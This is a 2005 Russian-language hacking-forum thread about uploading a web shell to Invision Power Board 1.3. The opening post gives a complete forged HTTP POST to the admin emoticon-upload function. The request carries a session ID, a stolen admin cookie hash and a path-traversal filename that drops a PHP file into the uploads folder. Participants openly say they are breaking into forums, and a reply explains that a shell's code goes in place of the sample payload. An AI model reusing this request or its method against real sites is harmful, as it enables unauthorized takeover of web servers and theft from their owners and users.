HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу Залить шелл через подделку http запросов, на примере ipb 1.3
   
Ответ
Страница 1 из 3 1 2 3 >
 
Опции темы Поиск в этой теме Опции просмотра

Залить шелл через подделку http запросов, на примере ipb 1.3
  #1  
Старый 15.03.2005, 02:10
SURRENDER
Новичок
Регистрация: 02.12.2004
Сообщений: 11
С нами: 11283449

Репутация: 0
По умолчанию Залить шелл через подделку http запросов, на примере ipb 1.3
Вот Я дошёл до того момента где нужно залить шелл прав на папке со смайлами конечно же не оказалось...

POST http://someSiteForum/admin.php?adses...1f59424a4e96f7 HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://someSiteForum/admin.php?adses...ct=op&code=emo
Accept-Language: ru
Content-Type: multipart/form-data; boundary=---------------------------7d43942c405bc
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 677
Pragma: no-cache
Cookie: member_id=1; pass_hash=cf20fc37b4g0be45c1336f29d444e798;

-----------------------------7d43942c405bc
Content-Disposition: form-data; name="adsess"

7456d367b18da87d161f59424a4e96f7
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="code"

emo_upload
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="act"

op
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000000
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="FILE_UPLOAD"; filename="../../uploads/myFile.php"
Content-Type: application/octet-stream

<% echo("Hello from injected PHP script") %>
-----------------------------7d43942c405bc--

Всё понятно, но как указать локальный путь до файла, как он поймёт что Я именно хочу загрузить?
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 15.03.2005, 02:19
(-=util=-)
Постоянный
Регистрация: 02.12.2004
Сообщений: 352
С нами: 11282726

Репутация: 67
По умолчанию
А если у тебя хэш cf20fc37b4g0be45c1336f29d444e798 и id то разве нельзя потделать куки вместо http запроса? и зайти админом ? Или я что то путаю?
 
Ответить с цитированием

  #3  
Старый 15.03.2005, 02:34
SURRENDER
Новичок
Регистрация: 02.12.2004
Сообщений: 11
С нами: 11283449

Репутация: 0
По умолчанию
Да это само собой, Я уже в админке, но мне не форум нужен
 
Ответить с цитированием

  #4  
Старый 15.03.2005, 02:54
mikrobx
Новичок
Регистрация: 11.02.2005
Сообщений: 7
С нами: 11180609

Репутация: 0
По умолчанию
да я тоже взламываю форум и хочу болше как залит шелл ???????
 
Ответить с цитированием

  #5  
Старый 15.03.2005, 03:24
(-=util=-)
Постоянный
Регистрация: 02.12.2004
Сообщений: 352
С нами: 11282726

Репутация: 67
По умолчанию
аа.. всё торможу как всегда =) Да. Меня тоже вопрос волнует этот. Где пареметры на локальный адрес..
Последний раз редактировалось (-=util=-); 15.03.2005 в 03:29..
 
Ответить с цитированием

  #6  
Старый 17.03.2005, 05:35
SURRENDER
Новичок
Регистрация: 02.12.2004
Сообщений: 11
С нами: 11283449

Репутация: 0
По умолчанию
Algol, пожалуйста, обрати внимание! =\
 
Ответить с цитированием

  #7  
Старый 17.03.2005, 05:40
White Jordan
Guest
Сообщений: n/a
С нами:

Репутация:
По умолчанию
Ну просто много LOL!!!!!!!

Ага щас он вам поможет!!!! LOL!!!!!!!
Последний раз редактировалось White Jordan; 17.03.2005 в 05:45..
 
Ответить с цитированием

  #8  
Старый 17.03.2005, 08:43
SURRENDER
Новичок
Регистрация: 02.12.2004
Сообщений: 11
С нами: 11283449

Репутация: 0
По умолчанию
Ну он же эту статью писал (про ipb1.3) он должен знать...
 
Ответить с цитированием

  #9  
Старый 17.03.2005, 13:40
(-=util=-)
Постоянный
Регистрация: 02.12.2004
Сообщений: 352
С нами: 11282726

Репутация: 67
По умолчанию
ну что никто неотвечает? Вообще последнее время что то нету активного народа не форуме....
 
Ответить с цитированием

  #10  
Старый 17.03.2005, 13:50
Algol
Регистрация: 29.05.2002
Сообщений: 1,794
С нами: 12604706

Репутация: 0


По умолчанию
Цитата:
Сообщение от SURRENDER  

Всё понятно, но как указать локальный путь до файла, как он поймёт что Я именно хочу загрузить?
Какой еще файл?? Вся отсылаемая на сервер информация УЖЕ содержится в HTTP-пакете.
А вот это
PHP код:
<% echo("Hello from injected PHP script") %> 
и есть сам скрипт, который ты заливаешь. Вместо приведенного, тебе естественно, нужно вставить текст шелла.
 
Ответить с цитированием
Ответ
Страница 1 из 3 1 2 3 >



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
залить шелл через ipb 2.0.4 alakazam Уязвимости CMS / форумов 4 16.11.2005 22:08
Как залить шелл через PhPBB SheFF Уязвимости CMS / форумов 5 29.11.2004 01:25
Как залить шелл через IPB форум, при отсутствии ftp? bbmz Уязвимости CMS / форумов 1 26.11.2004 18:15



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.